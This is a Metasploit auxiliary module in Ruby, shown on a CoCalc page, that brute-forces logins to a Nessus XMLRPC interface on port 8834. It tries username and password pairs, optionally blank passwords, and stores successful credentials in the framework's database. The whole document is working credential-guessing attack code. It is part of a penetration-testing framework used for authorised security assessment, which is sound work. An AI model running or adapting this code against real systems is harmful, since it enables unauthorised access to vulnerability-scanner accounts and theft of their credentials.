CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::AuthBrute
10
  include Msf::Auxiliary::Scanner
11

12
  def initialize
13
    super(
14
      'Name'           => 'Nessus XMLRPC Interface Login Utility',
15
      'Description'    => %q{
16
        This module simply attempts to login to a Nessus XMLRPC interface using a
17
        specific user/pass.
18
      },
19
      'Author'         => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
20
      'License'        => MSF_LICENSE,
21
      'DefaultOptions' => { 'SSL' => true }
22
    )
23

24
    register_options(
25
      [
26
        Opt::RPORT(8834),
27
        OptString.new('URI', [true, "URI for Nessus XMLRPC login. Default is /login", "/login"]),
28
        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
29
      ])
30
  end
31

32
  def run_host(ip)
33
    begin
34
      res = send_request_cgi({
35
        'uri'     => datastore['URI'],
36
        'method'  => 'GET'
37
        }, 25)
38
      http_fingerprint({ :response => res })
39
    rescue ::Rex::ConnectionError => e
40
      vprint_error("#{datastore['URI']} - #{e}")
41
      return
42
    end
43

44
    if not res
45
      vprint_error("#{datastore['URI']} - No response")
46
      return
47
    end
48
    if res.code != 403
49
      vprint_error("Authorization not requested")
50
      return
51
    end
52

53
    each_user_pass do |user, pass|
54
      do_login(user, pass)
55
    end
56
  end
57

58
  def do_login(user='nessus', pass='nessus')
59
    vprint_status("Trying username:'#{user}' with password:'#{pass}'")
60
    headers = {}
61

62
    begin
63
      res = send_request_cgi({
64
        'encode'    => true,
65
        'uri'       => datastore['URI'],
66
        'method'    => 'POST',
67
        'headers'   => headers,
68
        'vars_post' => {
69
          'login'    => user,
70
          'password' => pass
71
        }
72
      }, 25)
73

74
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
75
      print_error("HTTP Connection Failed, Aborting")
76
      return :abort
77
    end
78

79
    if not res
80
      print_error("Connection timed out, Aborting")
81
      return :abort
82
    end
83

84
    if res.code != 200
85
      vprint_error("FAILED LOGIN. '#{user}' : '#{pass}'")
86
      return :skip_pass
87
    end
88

89
    if res.code == 200
90
      if res.body =~ /<status>OK<\/status>/
91
        print_good("SUCCESSFUL LOGIN. '#{user}':'#{pass}'")
92
        report_cred(
93
          ip: datastore['RHOST'],
94
          port: datastore['RPORT'],
95
          service_name: 'nessus-xmlrpc',
96
          user: user,
97
          password: pass
98
        )
99
        return :next_user
100
      end
101
    end
102
    vprint_error("FAILED LOGIN. '#{user}':'#{pass}'")
103
    return :skip_pass
104
  end
105

106
  def report_cred(opts)
107
    service_data = {
108
      address: opts[:ip],
109
      port: opts[:port],
110
      service_name: opts[:service_name],
111
      protocol: 'tcp',
112
      workspace_id: myworkspace_id
113
    }
114

115
    credential_data = {
116
      origin_type: :service,
117
      module_fullname: fullname,
118
      username: opts[:user],
119
      private_data: opts[:password],
120
      private_type: :password
121
    }.merge(service_data)
122

123
    login_data = {
124
      last_attempted_at: DateTime.now,
125
      core: create_credential(credential_data),
126
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
127
    }.merge(service_data)
128

129
    create_credential_login(login_data)
130
  end
131
end
132

133